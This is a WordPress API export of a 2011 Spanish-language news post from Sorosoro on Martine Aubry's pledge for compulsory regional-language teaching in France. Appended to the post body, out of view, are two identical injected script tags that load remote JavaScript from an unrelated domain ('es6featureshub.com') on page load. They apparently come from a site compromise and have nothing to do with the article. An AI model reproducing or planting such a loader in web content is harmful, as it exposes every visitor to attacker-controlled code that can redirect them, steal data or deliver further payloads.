{"id":58567,"date":"2011-10-08T10:35:41","date_gmt":"2011-10-08T08:35:41","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=58567"},"modified":"2025-10-21T22:20:03","modified_gmt":"2025-10-21T20:20:03","slug":"4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/","title":{"rendered":"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario <i>Ouest-France<\/i>"},"content":{"rendered":"<p style=\"text-align: justify;\">Decididamente, el <strong>per\u00edodo electoral franc\u00e9s<\/strong> es propicio para las declaraciones de intenci\u00f3n sobre las <strong>lenguas regionales<\/strong>. Esta vez, despu\u00e9s de <a href=\"https:\/\/www.sorosoro.org\/es\/12-de-agosto-de-2011-frederic-mitterrand-ministro-de-cultura-de-francia-no-ve-el-interes-de-una-ley-sobre-las-lenguas-regionales-en-francia\">Fr\u00e9d\u00e9ric Mitterand<\/a> (actual Ministro de Cultura) y de <a href=\"http:\/\/www.sorosoro.org\/en\/september-14-15-2011-french-presidency-candidate-francois-hollande-on-regional-languages\" target=\"_blank\">Fran\u00e7ois Hollande<\/a> (candidato del PS), es Martine Aubry, igualmente candidata por el Partido Socialista quien se compromete.<\/p>\n<p style=\"text-align: justify;\">Ella misma va a preconizar una <strong>ense\u00f1anza obligatoria de las lenguas regionales<\/strong> all\u00ed donde son practicadas, excepto el \u00abdesacuerdo expreso de las familias\u201d.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Tambi\u00e9n podr\u00e1 asombrarnos una toma de posici\u00f3n tan fuerte de parte de una representante de un partido que mucho tiempo ha rechinado para valorar las lenguas regionales, bajo pretexto de que ellas representar\u00edan un peligro para la unidad de la rep\u00fablica. Pero todo, aparentemente, ha evolucionado, puesto que Martine Aubry en la actualidad se opone a la idea de que \u00abla unidad de Francia debe pasar por la uniformidad\u00bb y declara: \u00abes evidente que se defiende mejor la rep\u00fablica francesa cuando se vive en su territorio, con su cultura. Y es por eso que yo defiendo con ardor el ideal republicano, defiendo la diversidad cultural de Francia y de los franceses\u00bb.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">En el plan de la ejecuci\u00f3n, la candidata propone que el aprendizaje de las lenguas regionales ha llegado a ser una <strong>nueva competencia de las regiones<\/strong>, al entender que \u00ablas decisiones de los rectores de la academia deber\u00e1n articularse con esta pol\u00edtica regional\u00bb.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Pues bien, muchas bellas promesas que van m\u00e1s lejos de aquellas expresadas hasta el presente por los otros candidatos de su partido. Queda por saber cu\u00e1l ser\u00e1 el destino de estas promesas una vez que las elecciones pasen\u2026<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.ouest-france.fr\/region\/bretagne_detail_-Langue-bretonne-Martine-Aubry-au-creneau-_8619-1996256_actu.Htm\" target=\"_blank\">Para leer el art\u00edculo de <em>Ouest-France<\/em><\/a><\/p>\n<p style=\"text-align: justify;\">\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Decididamente, el per\u00edodo electoral franc\u00e9s es propicio para las declaraciones de intenci\u00f3n sobre las lenguas regionales. Esta vez, despu\u00e9s de Fr\u00e9d\u00e9ric Mitterand (actual Ministro de Cultura) y de Fran\u00e7ois Hollande (candidato del PS), es Martine Aubry, igualmente candidata por el Partido Socialista quien se compromete. Ella misma va a preconizar una ense\u00f1anza obligatoria de las [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-58567","post","type-post","status-publish","format-standard","hentry","category-noticias"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"Decididamente, el per\u00edodo electoral franc\u00e9s es propicio para las declaraciones de intenci\u00f3n sobre las lenguas regionales. Esta vez, despu\u00e9s de Fr\u00e9d\u00e9ric Mitterand (actual Ministro de Cultura) y de Fran\u00e7ois Hollande (candidato del PS), es Martine Aubry, igualmente candidata por el Partido Socialista quien se compromete. Ella misma va a preconizar una ense\u00f1anza obligatoria de las [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-10-08T08:35:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:20:03+00:00\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France\",\"datePublished\":\"2011-10-08T08:35:41+00:00\",\"dateModified\":\"2025-10-21T20:20:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/\"},\"wordCount\":300,\"articleSection\":[\"Noticias sobre los idiomas en peligro\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/\",\"name\":\"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"datePublished\":\"2011-10-08T08:35:41+00:00\",\"dateModified\":\"2025-10-21T20:20:03+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/","og_locale":"es_ES","og_type":"article","og_title":"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France - Sorosoro","og_description":"Decididamente, el per\u00edodo electoral franc\u00e9s es propicio para las declaraciones de intenci\u00f3n sobre las lenguas regionales. Esta vez, despu\u00e9s de Fr\u00e9d\u00e9ric Mitterand (actual Ministro de Cultura) y de Fran\u00e7ois Hollande (candidato del PS), es Martine Aubry, igualmente candidata por el Partido Socialista quien se compromete. Ella misma va a preconizar una ense\u00f1anza obligatoria de las [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/","og_site_name":"Sorosoro","article_published_time":"2011-10-08T08:35:41+00:00","article_modified_time":"2025-10-21T20:20:03+00:00","author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France","datePublished":"2011-10-08T08:35:41+00:00","dateModified":"2025-10-21T20:20:03+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/"},"wordCount":300,"articleSection":["Noticias sobre los idiomas en peligro"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/","name":"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"datePublished":"2011-10-08T08:35:41+00:00","dateModified":"2025-10-21T20:20:03+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/4-de-octubre-de-2011-martine-aubry-se-expresa-sobre-las-lenguas-regionales-en-el-diario-ouest-france\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"4 de octubre de 2011: Martine Aubry se expresa sobre las lenguas regionales en el diario Ouest-France"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/58567","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=58567"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/58567\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=58567"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=58567"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=58567"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}